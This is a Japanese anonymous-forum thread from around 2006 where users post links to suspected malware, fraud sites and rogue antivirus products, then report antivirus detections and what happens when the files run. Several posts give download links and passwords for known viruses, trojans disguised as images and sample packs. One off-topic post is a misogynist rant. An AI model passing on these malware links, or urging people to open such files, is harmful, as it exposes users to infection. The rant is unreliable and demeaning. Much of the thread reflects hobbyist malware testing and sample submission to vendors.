あやしいファイルを実行するスレ

どうぞ
ttp://www.uploda.org/uporg306729.zip
ttp://popra.zone.ne.jp/movie/wmv.exe

>>1
上は消えてる
下は実行してみたらいきなりネットにつなごうとした
拒否したら「サーバーから情報を得られませんでした」だと

>>1
下はワンクリック詐欺のサイトだ。
ホスティングしている会社からの警告か何かで一旦消されたはずなんだがなぁ。
またアップロードしやがったのか？
しつこい業者だな・・・。

ワンクリック系は技術的にはまだ稚拙だから駆除しようとすればすぐにできるな。
しかし、ステルス系の高度なものが出現すると厄介だな。

>>1
下はカスペでTrojan-PSW.Win32.Kapod.nとして検出されます。

ＪＵＳＴ the ＧＴＬ （エロサイト、ココ自体は安全）で紹介されてるエロ画像直リンでウィルス感染したｗ
http://www.genie.x0.com/gtl/new.html

2/17分のどれかだったと思う。 今まで世話になったがモウイカネｗ

先日、WEB専門 広告代理店『 Lapis-Lazuli 』というところから、
バナー広告掲載依頼のメールが来て、
下記のアドレスを参照し、画像をクリックしたところ、ほんの１秒ほどＤＯＳっぽい怪しげな画面が立ち上がったので、不安な状態です。

--------------------------------------------------
サイト名　　妹くらぶ
ＵＲＬ　　　http://www.236488.com/
概要　　　　アニメコンテンツと実写コンテンツを
　　　　　　ご用意して運営しております。
　　　　　　形と致しましては2クリックでのご入会で、
　　　　　　最終的な確認画面も御座います。
　　　　　　一日当たりの料金は134円となっております。
--------------------------------------------------

感染してしまったのでしょうか・・？　誰か分かる方ヘルプ

ここはあやしいファイルを実行してウイルスに感染するスレだよ

どのスレに書き込んでいいのか分からなかったので、　6　の書き込みに近いから良いのかと思ったんだけど。

>>9
典型的なワンクリック詐欺サイト。
これ以上は無いくらいに典型的。
何も相手することは無い。
相手をしてメールを送ったり、電話をかけると大変なことになる。

>>10
ありがとうございます。教えてくれて大変助かりました。

症状が何も出なかったので、スパイウェアが仕掛けられたり、ある日突然プツンとハードディスクがやられたりしているのかと、心配になっていました。

もちろん、性的な意味で。

発　行　　 マカフィー株式会社
〒150-0043
渋谷区道玄坂1-12-1　渋谷マークシティウエスト20F
TEL.03-5428-1100（代）

Copyright(c)2004,2005　McAfee,Inc.AllRightsReserved.

（￣_J￣)ん？…マカフィーがどうかしたか？

ネタ持ってきたので踏んじゃってください。　http://mysky.6600.org/yx/gz.exe

>>15
実行しようとﾀﾞｳｿしたらバスター反応
BKDR_HUPIGON.FN　詳細情報無し

それともこのスレはアンチウイルス切ってでも実行するという趣旨なのか

>>15
マカフィー無反応（´・ω・）ﾜﾛｲｿｽ

>>16
8 名無しさん＠お腹いっぱい。 sage 2006/02/22(水) 02:16:51
ここはあやしいファイルを実行してウイルスに感染するスレだよ

>>15を実行した
Windowsフォルダ内に
IEXPL0RE.EXE と IEXPL0RE.PIF を作成
IEXPL0RE.EXE は gz.exeと同内容
後はよくわからんのでregmonのログでも貼っておく
ttp://www.uploda.org/uporg411027.txt

http://www.geocities.jp/kumada_eri/index.html

（　＾−＾）

怪しいファイルを実行しようとしてもソフトウェア制限ポリシーによってこのプログラムは
実行できないようになっています。

って出てくるだけなんです。どうやったら感染してくれますか？

ttp://support.microsoft.com/default.aspx?scid=kb%3Bja%3B310791

http://giwaku.com/1c.shtml

これってウイルスですか?
感染したような気が。。。
解決法あったらよそしくお願いします。

>>24
この板では鑑定はしないよ。
鑑定スレのある板で。
勇気がなくて見られない画像鑑定スレ Part814(ラウンジ板)
http://etc3.2ch.net/test/read.cgi/entrance/1156992526/

>>24
マルチ視ね

>>26
呼んだ？

http://www.dotup.org/uploda/www.dotup.org7890.zip.html
踏んでも大丈夫か検証お願い

>>28
503

普通に見れるけど、　　　実行たのむ

ほんとだ、さっきのは偶然か　アクセスできるようになったら検証頼みます

ダメだろこれ。avast!にbitdefenderも反応するし

>>28
バスターで「TROJ_PVSTEALTH.B」

それともこのスレはアンチウイルス切ってでも実行するという趣旨なのか

ありがとうございます、　ソースネクストのソフトでは無反応だったもので、

このスレはソースネクストのソフトを入れて実行するという趣旨だったらしい

>>28
ぜひいろんなファイルを実行して、糞ースの凄さを見せつけてくれ！

拾ってきたよ
http://vipperup.orz.hm/uploader/src/viup10527.zip.html
パス：vip

>>37
強制再起動食らった

新種ウイルスの可能性あります。

initial d　のほぼ全話が見れるサイト
ウイルスファイルの可能性もあるが、
とりあえず映像は見られる。

http://carfreaks.b0nk.net/InitialD/

どのファイルかは分からないけど
実行すると 不正ななんとか がどうのこうのと出て
なぜかGYAOが見られなくなります。

全部aviの様ですが

aviの再生環境くらい整えてから物を言え

http://www.vipper.net/vip90889.jpg

これで感染して困っています、対処教えて下さい。
ちょうどアンチウィルス期限切れた翌日だったので。。
体験版カスペルスキーが弾かれます･･･。

404えらー

http://www.freepgs.com/asia_colgate/pcast_1.1.exe

お願いします。
以前ウィルスバスターをかわして、ＰＥＳＴ　ＰＡＴＲＯＬを導入後見つかった物です。

>>44
「PodcastbarMini」というp2pを用いたTV視聴アプリケーションらしい
BitDefenderはインストーラの段階でトロイ扱いした
出所は中華圏らしく、インストール中は文字化けしていた
起動はさせてみたものの、やっぱりポート開放が必要なのか動かなかった

とりあえずそこまではAVKとSpySweeperは何も言わなかったが
アンインストールしてもフォルダ内に一部ファイルが残されたままとか
やや妙な点もあるので、eTrustの言うようにアドウェアなのかもしれない

触れぬが吉、かな

イートラじゃなくてペストパだな
http://vista.undo.jp/img/vi5870718561.jpg
何かよう分からんけど

>>45
>>46
ありがとうございました。

あの後、ウイルスバスター２００６から２００７をに変えてもう一度なんとか消してみようとしたんですが、
失敗しまして再インストールしてきました。

ぁゃιぃスレですね

もっとドキドキワクワクさせてくれるようなURL貼れよ

ぁゃιぃ系ロダのファイル開いてウィンドウがいっぱいになったのも
いい思い出だ

http://umbrellaexe.fc2web.com/ugtool.html
上のURLのSミサイルの謎を解明する奴求む。
PC壊れたらすまそ。Sミサイルの情報を探しているのです(´・ω・｀)

404エラーだったよ

>>52
え？あ、ほんとだｗ
すまん･･･(´・ω・｀)
お詫びにウイルスのURL貼り付けます…

ttp://keepsurfing.net/tool/virus/klez.zip
ttp://www2.strangeworld.org/virus/blasterworm.zip
ttp://popup8.tok2.com/home2/phocke/fla/one_z.swf
ttp://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=%22index+of%22+%22msblast.zip%22&lr=
ttp://renzyu.hp.infoseek.co.jp/denki.zip
ttp://www2.strangeworld.org/virus/blasterworm.zip
ttp://www.geocities.jp/virii3/mydoom/readme.zip
ttp://usuarios.lycos.es/unsafebytesftp2/troyanos/deepthroat3.zip
ttp://f31.aaacafe.ne.jp/~hira/Important.xls
ttp://webite.at.infoseek.co.jp/flash/wotakey_sugar.swf

ウイルスマニアだったりしますｗ
ちなみにウイルスかかるの嫌だから開かない派っす…
まだまだありますけど…

てか上の結構前のだからなくなってると思われる

なんだ、ウイルスはこれだけじゃないか
ttp://f31.aaacafe.ne.jp/~hira/Important.xls

ほとんどリンク切れだなぁｗ
最後のフラッシュが>>53の真の狙いか？ｗ

そもそもファイル名からしてクレズやブラスターとかゴミウイルスばかりだな
これで自称マニアとか惨めすぎる

マニアは何匹か自分の家で飼ってるモンだ

チェルノブイリが欲しいんだが
誰かない？

さてと

遠路はるばる過疎スレへようこそ

http://jp.drivecleaner.com/.freeware/
どうよこれ

クレズも一時は大暴れしたが、いまは対策ソフトで容易にとまるもんな

クレズ流行ってまだたいして経ってないよね？
なんかすごい勢いでウイルスも進化してるような、、、
破壊型から利益が得られるような(金とか)ウイルスが最近大杉｡
五年後とかどうなってんだろ・・・・

ウイルスがなくなっているより先に、２ｃｈがなくなっている。

ｺﾅ━━━━(ﾟＡﾟ)━━━━ｲ !!!!! 　

ﾏﾀﾞｧ-? （･∀･ ）っ/凵⌒☆ﾁﾝﾁﾝ

つwww.game4enjoy.net/av/061121-t.jpg.scr

Now reporting please wait...

>>67
Trojan-PSW.Win32.Maran.bg

>>68
楽しみに待ってるぜ

ＪＰＧ偽装のＥＸＥファイルです。（拡張子をＳＣＲにしただけ）
http://www.dotup.org/uploda/www.dotup.org11706.png

実行しても特に何も起こらなかったので再起動しようとするとプログラムが終了できないというメッセージ
http://www.dotup.org/uploda/www.dotup.org11708.png
タスクマネージャでも終了不可能
http://www.dotup.org/uploda/www.dotup.org11710.png

しかたなく強制終了するとWindowsお決まりのメッセージ
http://www.dotup.org/uploda/www.dotup.org11711.png

ＩＥのトップページ等は変わっていません
http://www.dotup.org/uploda/www.dotup.org11712.png

氏万テックオンラインスキャンの結果
http://www.dotup.org/uploda/www.dotup.org11716.png

>>70
また鳥付け忘れたスマンコ

>>67
Generic PWS.b

ドピュ

ttp://www.nya-taloda.jpn.org/2MB/upload.cgi?mode=dl&file=1786
DLkey:antidote

これは大丈夫でしょうか？

>>74
問題ないけど？

ありがとうございました

つくってみた
http://pcseclabs.web.fc2.com/

system doctor 入れたｗｗｗ

うほっ

インスコマンコ３ WILLTYは〜？

http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%ba%a4%d0%a4%ea%b8%c0%a4%a6%a4%ef%a4%e8.sfx.exe?bcarneFBNb81hieF
http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%ba%a4%d0%a4%ea%b8%c0%a4%ef%a4%ca%a4%a4%a4%ef%a4%e8.sfx.exe?bcarneFBW0bifhc.

>>81
ちょ。。。なにそれ？？

ブラクラ

>>81
変なの落ちてきたんだけど......

アーカイブボムか。ｽﾏｿ。

http://www.seospy.net/src/up0365.zip

インスコマンコ頼んだ！

AntiVir、BitDefenderで反応なし。レビューでも書くか

これ参考にして
eSafe、Fortinet、F-Prot4、Panda、では検出される
http://www.virustotal.com/vt/en/resultadof?43b11ed394605abbf0521148e0336ee6

とりあえずAntiVirに送っといた
Dear user,
Digital data should always be safe - free of viruses and of harmful code. 
Because of this reason, we are happy you are using our Internet offer to 
have suspicious files examined for a possible infection.
We have forwarded the file/s you have uploaded to our specialists from the virus lab. 
The file/s is/are being analyzed.
We will shortly communicate you the result via email - please have some patience.
We are at your disposal for all kinds of questions regarding virus protection. Please call us 
at +49 (0) 7542-500 0 or drop us an email to [email protected]
Please find current information about Avira and our security solutions on our website: www.avira.com
--
Yours sincerely
Avira GmbH

レポートまだ〜？

http://proxy.f3.ymdb.yahoofs.jp/bc/450fd633_152da/bc/%a4%c5%a4%e9%a4%c5%a4%e9%a4%c5%a4%e9.sfx.exe?bcOoqeFB1T.uhkqm

>>86
なぜかランタイムエラーと出て実行できなかった

http://www.freedownloadscenter.com/Authors/WinSoftware.html
ここにあるもの全部お願いしますorz

うわ。。。。。押し売りソフトのオンパレードだ・・・

インスコマンコさん
662 名前：655[sage] 投稿日：2006/12/09(土) 21:40:14 0
これがウイルス本体：悪用厳禁　DLkey=dokuro
http://2chshare.net/mini/files/2chshare-mini_0081.zip.html
ぱっと見た感じjpgファイルだけど実はexe
実行した後少しの時間潜伏して再起動→ドクロ
その後>>655のファイルなどを展開 >>655は消しました。

これを頼みます。
頼れるのはインスコマンコさんだけです。

>>93
これはｗｗ
＞WinContentFilter 2005　珍しいから入れてみる

http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/19

>>97
くだらないことやってんな、ばーか

Welcome to WinSoftware!!
ttp://files.or.tp/up2567.png

>>93,95,96
やってみます

>>100
インスコマン３生きてるか・・・・・・？

インスマンコは今はサイトの方を頑張っているのさ多分

なんかサイトは更新されてるようだから生きてるよ

おっSystemDoctor2006が増えた /~

本スレにいないと思ったらこんな事をやっていたのかw

WinSoftwareの恨みを買わないように気をつけろよｗ

WinContentFilter 2005のSS
http://files.or.tp/up2586.zip

えへへへ

だいぶインスコマンコ３のサイトが変わっていてワロタ
http://pcseclabs.web.fc2.com/

>>109
GIGAZINEだらけだなｗ

掲示板が２ちゃんっぽいｗｗｗｗｗ

　　　　

おいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおいおい

初代を最近見かけないな｡

http://www2.uploader.jp/dl/reika/reika_uljp00071.zip.html

お願いします。アドウェアだとおもうのですが・・・

>>115
http://www.virustotal.com/vt/en/resultadof?d2ea1e25369a3454a980a2148565e456

ウイルスセキュリティをインスコしたぞ！！これで踏んでみよう

クリスマスプレゼントを踏んだがカスペで検出するもの5個検出せず
Antinny系はWorm.Win32.Antinny.ayを検出できなかった。（ちなみにMicrosoftとSophosも）
なんてクールでエキサイティングなセキュリティソフトなんだ！

WinAntiVirusPro2006レビューキター
http://pcseclabs.web.fc2.com/winantiviruspro2006.html

(ﾟДﾟ)ﾊｧ?

これは癖になるな

実はWinAntiVirusProの検出力は真面目。

ttp://ranobe.com/up/src/up157349.zip

exeアプリケーションの鑑定を御願いします

passはsageです

>>123
PangYaCalc.exeはLHA圧縮で内部にPangYaCalc.msiとsetup.exeが入ってる。
setup.exeは署名は入っていないが著作権はMicrosoft Corporationが持っている模様。
http://www.uploda.org/uporg614436.png.html
http://www.uploda.org/uporg614440.png.html

眠い・・・

>>124
鑑定ありがとうございます

良スレage

age

http://skyst.net/e/src/sky0534.bin.html
Pass:vip

お願いします

>>128
エロ動画

>>129
ありがとうございます

>>129
いい思いしたな

あげ

http://www.zerovirus.jp/

ゼロウイルス！ゼロウイルス！

>>133
すっげー！！！！！！！！！！！！！！！！！！

完璧なスパイウェアー検索ツール
- ファイルの位置, 容量の比較による正確な検索
- レジストリの位置, キー, 値による正確な検索
- インターネットアクセスファイル(.URL)の内容分析による正確な検索
- 重複のないライン単位の個体数20000種以上保有

優秀なスパイウェアー検索エンジン及びウイルス検索エンジン
- 世界最大のスパイウェアーデーターベース保有
- 世界初ひとつのソフトでウイルス、スパイウェア同時検索・除去

パターンアップデートの容易性
- 24時間３６５日新しく発見されているスパイウェアー＆ウイルスの素早いアップデート
- ２４時間体制で緊急ウイルス発生に備えています。
- システムに影響を与えずにレジストリ、クッキー内を除去
- パターンアップデートをパソコン起動の際に自動チェック新種のウイルスもスパイウェアーもみのがしません
- お客様のご都合のいいようにアップデート提供

観光しにきました

絵葉書はどこに売ってますか？

観光に来ました

kannkou

らウンコから観光にきますた

ぁやしぃ観光きますた

ラウンコから観光にきました

観光にきました

観光しに来ました

音ゲー板から来ました

ゼロウイルス！販売元　株式会社ゼスタス
http://www.google.co.jp/search?q=%E6%A0%AA%E5%BC%8F%E4%BC%9A%E7%A4%BE%E3%82%BC%E3%82%B9%E3%82%BF%E3%82%B9&lr=lang_ja&ie=utf-8&oe=utf-8&rls=org.mozilla:ja:official&client=firefox

観光しにきました

観光死にきました

観光にきました

つまんねえ観光地だな

>>133
インストールしても、アップデートしか行われないわけだが

乙

ゼロウイルスセットアップ
http://sukima.vip2ch.com/up/sukima00701.png
http://sukima.vip2ch.com/up/sukima00702.png
reedme
http://sukima.vip2ch.com/up/sukima00703.png

デスクトップのアイコンをクリックするもアップデートが繰り返されるのみ。
すぐに終了してしまう
http://sukima.vip2ch.com/up/sukima00704.png
ショートカットはアップデート専用か？
http://sukima.vip2ch.com/up/sukima00705.png
しかし他のファイルを実行するもすぐ終了してしまって何も起こらず

誰かインスコしてくれ

>>133
BitDefenderでGeneric.Malware.w.7D653E9Cと
検出されるんだけど誤検出かな？

VirusTotalでチェックしてみたらUNAでも
Trojan.Spy.Win32.Agent.CB94と検出された

↑155の間違いねorz

まずネーミングからしてウイルスセキュリティZEROのパクリだもんな、ウィンアンチウイルスとかと一緒で

>>152
なぜ英語？

韓国みたいだね

さてと

>>158
キムなんたらって出てくるね・・・

なにこれ・・アップデートしかできないの？

VirusTotalにて
_zv.exe
http://www.virustotal.com/vt/en/resultadof?b44c0334be219a24bcc10bad0df840ba

http://www.zerovirus.jp/image/right/img_07c.gif

スーパー　ウェアー

スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
スパー　ウェアーｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

　　　　　　_______　　　　　　　　　　　　　　　　　　　　　_＿ 
　　　　／／￣~`i ゝ　　　　　　　　　　　　　　　 　 　 `l | 
　　　 / /　　　　　　　 ,______　　　,_____　　　　________　 | |　　____　TM 
　　　|　|　　 　 ＿__　//￣ヽヽ　//￣ヽヽ　（（￣）） 　 | |　//￣_>> 
　　　＼ヽ、　　 ｜l　| |　 　 | |　| |　 　 | |　　``( (.　　.| |　| | ~~ 
　　　 　 `、二===-'　 ` ===' '　　` ===' '　 //￣ヽヽ　|__ゝ ヽ二='' 
　　　　　　　　　　　　　　　　　　　　　　 　 ヽヽ___//　　　日本 


　　　　　ウェブ　イメージ　ニュース　マップ　グループ　more　>> 
　　　　　　　　　　￣￣￣　￣￣￣￣　￣￣　 ￣￣￣￣ ￣￣￣￣ 
　　　　　　 .＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿ 
　　　　　　｜スパーウェアー . 　 　 　 　 　 　 　 　 　│・検索オプション 
　　　　　　└────────────────┘・表示設定 
　　　　　　　 　| Google検索　|　I'm Feeling Lucky　|　　・言語ツール

スパーウェアー の検索結果のうち 日本語のページ 約 1,150 件中 1 - 10 件目 (0.27 秒) 

readmeの内容
------

1.「ゼロウイルス」はフーリーソフトウェアーで、個人、企業、官公署等の全ての所より
ご使用できます。

2.「ゼロウイルス」プログラムの使用中発生した全ての問題において一切責任を負いません。

3.「ゼロウイルス」は自動アップデート機能があります。
　　駆除リストのアップデート上にプログラムの新しい機能がが追加されます。

4.「ゼロウイルス」はシェアーウェアーです。あらゆる場所に広告してください。
　　掲示板などにアップされる場合はセットアップ・ファイルをアップしてください。

5.「ゼロウイルス」のお問い合わせは、 www.zerovirus.jpよりお願いします。

---ここまで---

＞「ゼロウイルス」はフーリーソフトウェアーで、
＞「ゼロウイルス」はシェアーウェアーです。
？

メクロウイルスwww

ttp://www.zerovirus.jp/virus_page01.html

株式会社ゼスタスはアンチスパイウェアーをはじめにウイルスバスターまでソフト一本で全サービスご提供できるように最善を尽くしております

利用規約がソフト名、会社名までバイドクターのそれとまったく一致している件について

…先生、会社概要と社名が一致しません！

まず起動画面
ttp://2chshare.net/pic/files/2chshare-pic_0164.png.html

２１個中のウイルスの内１個検出
ttp://2chshare.net/pic/files/2chshare-pic_0165.png.html

コンピューター全体スキャンでクッキーをいくつか検出。
誤検出が一つ。画像は誤検出したエントリー
ttp://2chshare.net/pic/files/2chshare-pic_0166.png.html

検体に使用したやつ↓(前回の検体はダウソ出来ない。)
名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2006/12/08(金) 13:09:07
けんたいあっぷでーとかんりょう...............|

・http://50.megaloda.org/uploda/www.megaloda.org0883.zip.html
ぜんかいのけんたいは↑これ

何回も同じファイルで検査をしても無駄にファイル要領をとるだけなんで
検出される可能性の低いものとか自分の判断で少なくしました。
あとセキュ版で拾ったものとかネットで拾ったものも少量追加しますた。
クリスマスプレゼントってことで！

ダウソﾊﾟｽ：xmas
ZiP解凍ﾊﾟｽ：xmas
☆★悪　　　　　用　　　　　厳　　　　　禁　　　　　だ　　　　　！★☆
・http://www.dotup.org/uploda/www.dotup.org11692.zip.html

※検出されないものがあれば検体として送ろう！
※ウイルスじゃないものがあったらｽﾏｿ

>>171
GUIも似てるし、無駄にPC最適化とかある所なんか梅毒そっくり。
アイコンも似てる。
四角が丸になっただけ。

ゼロウイルス独自で開発された新しいスキャン方式の
エンジンを搭載他のアンチスパイウェアーとは比較にならないぐらいの

比較にならないぐらいのなんだｗ

中古なら検体がいっぱいかもなw

中古？

インスコマンコー！
http://www.webwasher.jp/trial.html

>>177

それ、これの一位だろ？
　AV-Test.orgによるテスト結果（2006年10月2日付）
　http://www.eweek.com/article2/0,1895,2023127,00.asp

　”AV-Test ran a huge test of backdoors (59,053),
　bots (70,658) and trojan horses (159,971) for a total of
　289,682 malware samples.”

　# 1　WebWasher　　99.97%　　｜　　#21　F-Prot　　　　　77.88%
　# 2　AntiVir　　　　　99.95%　　｜　　#22　Command　　　77.11%
　# 3　AVK 2007　　　99.95%　　｜　　#23　Microsoft　 　　76.18%
　# 4　AVK 2006　　　99.89%　　｜　　#24　Ewido　　　　　　74.67%
　# 5　Symantec　　　99.04%　　｜　　#25　Sophos　　　　　65.55%
　# 6　Kaspersky　　　98.86%　　｜　　#26　eSafe　　　　　　59.34%
　# 7　F-Secure　　　98.24%　　｜　　#27　UNA　　　　　　　58.76%
　# 8　BitDefender 　96.51%　　｜　　#28　QuickHeal　　　　55.72%
　# 9　Norman　　　　96.34%　　｜　　#29　ClamAV　　　　　48.71%
　#10　Nod32　　　　　95.80%　　｜　　#30　eTrust-VET 　　48.37%

　#11　Avast!　　　　　95.17%　　｜　　#31　eTrust-INO　　　41.92%
　#12　AVG　　　　　　94.78%　　｜　　#32　VirusBuster　　　40.94%
　#13　Fortinet　　　　94.65%
　#14　McAfee　　 　　93.99%
　#15　Rising　　　 　　91.18%
　#16　Panda　　　　　90.45%
　#17　Dr Web　　　　90.38%
　#18　Trend Micro 　90.03%
　#19　Ikarus　　　　　84.77%
　#20　VBA32　　 　　81.28%

ちょっと通りますよ

>>179
ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

（・∀・）

（*´∀｀*）

あげ

http://up.spawn.jp/file/up59893.htm
お願いします

これからPCくり〜んいんすこしなおすから派手なの無い〜？

ヒント：Winny

>>185
http://www.freedownloadscenter.com/Authors/WinSoftware.html

His judgement cometh and that right soon

結婚を迷っている男性諸君、結婚すると不幸になる。女は外面は綺麗で清潔、内面はずるくて汚いため、口も悪くなる
今の女は「どうやって男にたかるか」を必死に考えている。騙されるな。家事は極めて軽労働になった
コンビニやＰＣ、風俗関係も、「嫁いらず」に拍車をかける。今の女は「人生の不良債権」
社会的に男女は対等で平等。男が女を養ったり守る必要はない「見切れ！見切り千両！情けは不要！つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、もはや女尊男卑〜結婚しようとするあなたを彼女は陰で小馬鹿にしている事でしょう〜

★☆★よほどの事が無い限り結婚は保留し、沢山の女性と自由に恋愛（セックス）を楽しめ♪★☆★　避妊（ピル等）は忘れずにねｄ（＾−＾
★☆★捨てた女は優しい真面目男が結婚（残飯処理）してくれるさｗ★☆★

それでも結婚するあなたへ[夫婦財産契約登記]
これはある意味では男の『究極の護身法』
夫婦の財産についての法律。夫婦財産契約により契約財産制となり、自分の稼いだ財産はすべて自分のもの
離婚時に財産の半分を配偶者に取られない

・弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親（そして無罪判決（笑
・狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。そして、骨盤が安定しているため

・ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、女には従軍させ、男たちには卑しい奴隷の仕事を課した
男児が生まれたら、脚と腕を不自由にして、戦えなくした
・王位継承権が女性にだけあったという事実だけから考えて、古代エジプトでは女性権力が非常に大きかった
男女平等どころか、かなり女性上位の社会であった
・日本国でも卑弥呼が女王
・昆虫などにいたっては、オスカマキリはメスに食われてしまう

女は虐げられてきた？父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・・

結婚はいいものだよ

軽快なディスクエディタを探しています。
AcronisDiskDirectorについているAcronis Disk Editorみたいなやつでなるべくフリーがいいです。

よろしくお願いしますorz

ttp://pc8.2ch.net/test/read.cgi/sec/1165936988/831

インスコマーン
お願い

ふむふむ

とりあえず
http://www.virustotal.com/vt/en/resultadof?a7abe8670e2acec141b0bc702a43f260

>>193
何も出てこないよ〜

>>193が表示されないので
http://www.virustotal.com/vt/en/resultadof?b22be4931b16c6c37dd85a5be696deb8

>>195
出てきた！　サンクス！

Avast
BitDefender
Kaspersky
Ikarus
Fortinet
しか検出しないとは

カスペは14時の更新で対応していた
出来立てホヤホヤのウイルスだな

Ikarusが検出してるあたりがいいな。なんか。

どうせwinnyでひろったやつだろ

>>191
当たり前のごとくウイルスバスター2006でも検知できなかったよ。
トレンドマイクロに検体を送った。

>>191
うちのアンラボなんかじゃとても検出できませんでしたよ、ハイ

AntiVirスレに張られてたんだけど、
ttp://www.fileup.org/fup127504.zip.html
これって何なんですか？
パスワードはどちらもvirusだそうです。

なにこれ

no virus found

>>203
VirusTotalに投げてみても両方とも何も検知出来ないという結果が返ってきた。
珍しいというか、本当に何も害が無いのかも。
片方(あくあ角aa.exe)は7-Zip形式の自爆書庫だけど、展開時にパスワードを求められる。

あくあ角aa　だか　あくあ角　でググるとフォントのスレに行くからひょっとして純粋なツールなのかしらん？

>>191
AntiVirが対応しました
Dear Sir or Madam, 

Thank you for your recent inquiry. 
 
We found a new virus in the attachment you have sent us. 
The pattern recognition will be integrated in one of our next updates. 
The virus will be detected as TR/Click.VB.PV. 
 
We thank you for your assistance. 
 
Attachment(s) you sent: 
- up4577.zip

test

　　 　　　　　　ﾊ,,ﾊ　　 
　　　　　 　 ('(ﾟ∀ﾟ∩_　おいらをどこかのスレに送って！ 
　　　　　　／ヽ 　 〈／＼　お別れの時にはお土産を持たせてね！ 
　　　　 ／|￣￣￣|.＼／ 
　　　 　 　| .ﾓﾂ煮..|／ 
　　　　　　 ￣￣￣ 
現在の所持品：たばこ・ライター・コーヒー・ブラックブラック・枕・ケータイ電話 
睡眠薬・聖教新聞 ・ダッチワイフ・外付けSCSI340MHDD・ネットランナー4月号 
TYG02・小嶋進社長・ゲルトモ・ディプスファンタジア・抵抗1kΩ(黄紫橙金)・媚薬 
バーボン・メシマズ嫁のお手製弁当・吉牛の割引券・銀魂１巻・将棋の駒(角行) 
ｼﾞﾝｷﾞｽｶﾝｷｬﾗﾒﾙ・ﾎｯﾄｶｰﾍﾟｯﾄ・第三のビール・笛・nintendoDS・執刀用メス・長ラン・74HC00 
Vodafone902SH・たまねぎ・折れたシャー芯・ノートの切れ端・飲みかけのコーラ・ヨウ素液・姉歯物件
フロッピー・Adobe Reader 7.0・

ttp://homepage1.nifty.com/kazubon/tclocklight/tclocklight-040702-3.zip
Windows Live OneCareで「望ましくない可能性のあるソフトウェア」といわれました

TClockなら問題ないよ。

MSにとってみれば、linuxでさえ「望ましくない可能性のあるソフトウェア」。

レスサンクスです
やっぱOneCareダメダメだなーｗ

携帯でも踏めるサイト晒してください。
特にデータが全部消えるやつ。

てｓ

>>191
トレンドマイクロがパターンファイル4.149.00で対応した。
TROJ_VB.HAYというトロイの木馬だと。

